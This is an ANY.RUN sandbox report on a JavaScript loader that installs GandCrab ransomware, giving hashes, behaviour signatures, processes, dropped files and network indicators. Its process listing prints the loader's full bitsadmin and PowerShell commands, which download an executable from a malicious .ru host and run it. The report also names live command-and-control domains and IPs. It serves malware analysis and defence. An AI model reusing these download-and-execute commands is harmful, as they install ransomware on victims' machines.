analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Love_You_2019_24452472-txt.js

Full analysis: https://app.any.run/tasks/c7f421f3-f2da-4763-91af-c6ecdc154a98
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Malware Trends Tracker     >>>
Analysis date: January 11, 2019, 00:18:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, CR line terminators
MD5:

2907842DDC0E0F3B7306F81D4912BE60

SHA1:

4207B309C45B7AA8A841AB1208364D8D49FA5DC3

SHA256:

AD59B1FB187A10D220F7480433FADC132D41CF361D3D8A06C7E5948B79F6764F

SSDEEP:

24:FheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWndHNih44Rm50YNLociXP:Fhi8Y9M4VDOK1mIEtOtwh4b50YNMciXP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 979574639568794.exe (PID: 3296)
      • 495958594939.exe (PID: 4024)
      • winsvcs.exe (PID: 2800)
      • 1993934968.exe (PID: 3464)
      • 1473236908.exe (PID: 2236)
      • winsvcs.exe (PID: 2828)
      • wincfg32svc.exe (PID: 3864)
      • 3528913375.exe (PID: 2544)
      • 1513826834.exe (PID: 3660)
      • 1739338477.exe (PID: 3192)
      • 1218740417.exe (PID: 3884)
      • 3588437294.exe (PID: 2728)

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 4068)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2216)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3248)
      • winsvcs.exe (PID: 2800)

    • Changes the autorun value in the registry

      • 979574639568794.exe (PID: 3296)
      • 1473236908.exe (PID: 2236)
      • 1993934968.exe (PID: 3464)

    • GandCrab keys found

      • 3528913375.exe (PID: 2544)

    • Actions looks like stealing of personal data

      • 3528913375.exe (PID: 2544)

    • Disables Windows Defender Real-time monitoring

      • winsvcs.exe (PID: 2828)

    • Writes file to Word startup folder

      • 3528913375.exe (PID: 2544)

    • Downloads executable files from IP

      • winsvcs.exe (PID: 2800)

    • Changes Security Center notification settings

      • winsvcs.exe (PID: 2828)

    • Dropped file may contain instructions of ransomware

      • 3528913375.exe (PID: 2544)

    • Disables Windows System Restore

      • winsvcs.exe (PID: 2828)

    • Renames files like Ransomware

      • 3528913375.exe (PID: 2544)

    • Connects to CnC server

      • 3528913375.exe (PID: 2544)

    • Deletes shadow copies

      • 3528913375.exe (PID: 2544)

    • Changes settings of System certificates

      • 3528913375.exe (PID: 2544)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2956)

    • Creates files in the user directory

      • powershell.exe (PID: 3248)
      • winsvcs.exe (PID: 2800)
      • 3528913375.exe (PID: 2544)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3248)
      • 979574639568794.exe (PID: 3296)
      • 1993934968.exe (PID: 3464)
      • winsvcs.exe (PID: 2800)
      • 1473236908.exe (PID: 2236)
      • winsvcs.exe (PID: 2828)

    • Starts itself from another location

      • 979574639568794.exe (PID: 3296)
      • 1993934968.exe (PID: 3464)
      • 1473236908.exe (PID: 2236)
      • winsvcs.exe (PID: 2828)

    • Creates files in the program directory

      • 3528913375.exe (PID: 2544)

    • Reads the cookies of Mozilla Firefox

      • 3528913375.exe (PID: 2544)

    • Creates files like Ransomware instruction

      • 3528913375.exe (PID: 2544)

    • Connects to SMTP port

      • wincfg32svc.exe (PID: 3864)

    • Adds / modifies Windows certificates

      • 3528913375.exe (PID: 2544)

  • INFO

    • Dropped object may contain TOR URL's

      • 3528913375.exe (PID: 2544)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
18
Malicious processes
10
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start wscript.exe no specs cmd.exe no specs cmd.exe no specs bitsadmin.exe no specs powershell.exe 979574639568794.exe winsvcs.exe 495958594939.exe no specs 1993934968.exe 1473236908.exe winsvcs.exe wincfg32svc.exe #GANDCRAB 3528913375.exe 1739338477.exe no specs 1218740417.exe no specs wmic.exe no specs 1513826834.exe no specs 3588437294.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2956"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_24452472-txt.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4068"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2216"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3176bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exeC:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3248PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3296"C:\Users\admin\AppData\Local\Temp\979574639568794.exe" C:\Users\admin\AppData\Local\Temp\979574639568794.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2800C:\Users\admin\495030305060\winsvcs.exeC:\Users\admin\495030305060\winsvcs.exe
979574639568794.exe
User:
admin
Integrity Level:
MEDIUM
4024C:\Users\admin\AppData\Local\Temp\495958594939.exe C:\Users\admin\AppData\Local\Temp\495958594939.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3464C:\Users\admin\AppData\Local\Temp\1993934968.exeC:\Users\admin\AppData\Local\Temp\1993934968.exe
winsvcs.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2236C:\Users\admin\AppData\Local\Temp\1473236908.exeC:\Users\admin\AppData\Local\Temp\1473236908.exe
winsvcs.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
864
Read events
703
Write events
156
Delete events
5

Modification events

(PID) Process:(2956) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2956) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3248) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3248) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
283
Text files
213
Unknown types
11

Dropped files

PID
Process
Filename
Type
3248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SL3PNN9VLDS59EPX0V1K.temp
MD5:
SHA256:
25443528913375.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
3248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF246c09.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2800winsvcs.exeC:\Users\admin\AppData\Local\Temp\3528913375.exeexecutable
MD5:5A31E0AE80102A6B25FA0CA56CF7C15E
SHA256:DC92A406EC40D1356ABBD8DD8EA8CA90AE84516B741D3D898F892DB31D470480
2800winsvcs.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\2[1].exeexecutable
MD5:9CCE24E78759E70020A4C1C82359F471
SHA256:9A3064A02F7D45B5D073D5653C53694EBFD37AF6255A0B928703A11EAC4A142D
34641993934968.exeC:\Users\admin\657607470096780\winsvcs.exeexecutable
MD5:B58FE475F58E3070E3F506085108EF76
SHA256:35DE112DE2021EB54DEA91383112609551240DB7D95AC0171D224CA13FA4E0E5
2800winsvcs.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\1[1].exeexecutable
MD5:B58FE475F58E3070E3F506085108EF76
SHA256:35DE112DE2021EB54DEA91383112609551240DB7D95AC0171D224CA13FA4E0E5
3296979574639568794.exeC:\Users\admin\495030305060\winsvcs.exeexecutable
MD5:3ABB1F4A8F2FDEB302985911BFEFD6BF
SHA256:5E901677DAD76C0DC21DA659115B4D08E1E27C279C1CD038518AE1518646C306
3248powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2800winsvcs.exeC:\Users\admin\AppData\Local\Temp\1993934968.exeexecutable
MD5:B58FE475F58E3070E3F506085108EF76
SHA256:35DE112DE2021EB54DEA91383112609551240DB7D95AC0171D224CA13FA4E0E5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
62
TCP/UDP connections
52
DNS requests
32
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2800
winsvcs.exe
GET
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/1.exe
RU
malicious
2800
winsvcs.exe
GET
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/2.exe
RU
malicious
HEAD
200
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
malicious
2800
winsvcs.exe
GET
92.63.197.48:80
http://92.63.197.48/m/1.exe
RU
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
abr
5.00 Kb
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
executable
4.50 Kb
malicious
GET
206
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/krablin.exe
RU
binary
4.99 Kb
malicious
2800
winsvcs.exe
GET
404
92.63.197.48:80
http://92.63.197.48/m/4.exe
RU
html
178 b
malicious
2828
winsvcs.exe
GET
304
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/1.exe
RU
malicious
2800
winsvcs.exe
GET
200
92.63.197.48:80
http://slpsrgpsrhojifdij.ru/1.exe
RU
executable
261 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
2544
3528913375.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
2828
winsvcs.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
2544
3528913375.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2544
3528913375.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
2800
winsvcs.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
3864
wincfg32svc.exe
67.195.228.141:25
mta5.am0.yahoodns.net
Yahoo
US
unknown
2544
3528913375.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
3248
powershell.exe
92.63.197.48:80
slpsrgpsrhojifdij.ru
RU
malicious
2544
3528913375.exe
138.201.162.99:80
www.fliptray.biz
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
slpsrgpsrhojifdij.ru
  • 92.63.197.48
malicious
yahoo.com
whitelisted
mta5.am0.yahoodns.net
  • 67.195.228.141
  • 98.136.102.54
  • 98.137.159.25
  • 98.137.159.26
  • 74.6.137.63
  • 98.137.159.28
  • 74.6.137.65
  • 74.6.137.64
unknown
www.2mmotorsport.biz
  • 78.46.77.98
unknown
osheoufhusheoghuesd.ru
malicious
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 138.201.162.99
malicious
ofheofosugusghuhush.ru
unknown

Threats

PID
Process
Class
Message
A Network Trojan was detected
SC BAD_UNKNOWN Request, which might be made by Trojan-Downloader.MSOffice.DdeExec
3248
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2800
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2800
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2800
winsvcs.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2800
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2800
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
2800
winsvcs.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2800
winsvcs.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Love_You_2019_24452472-txt.js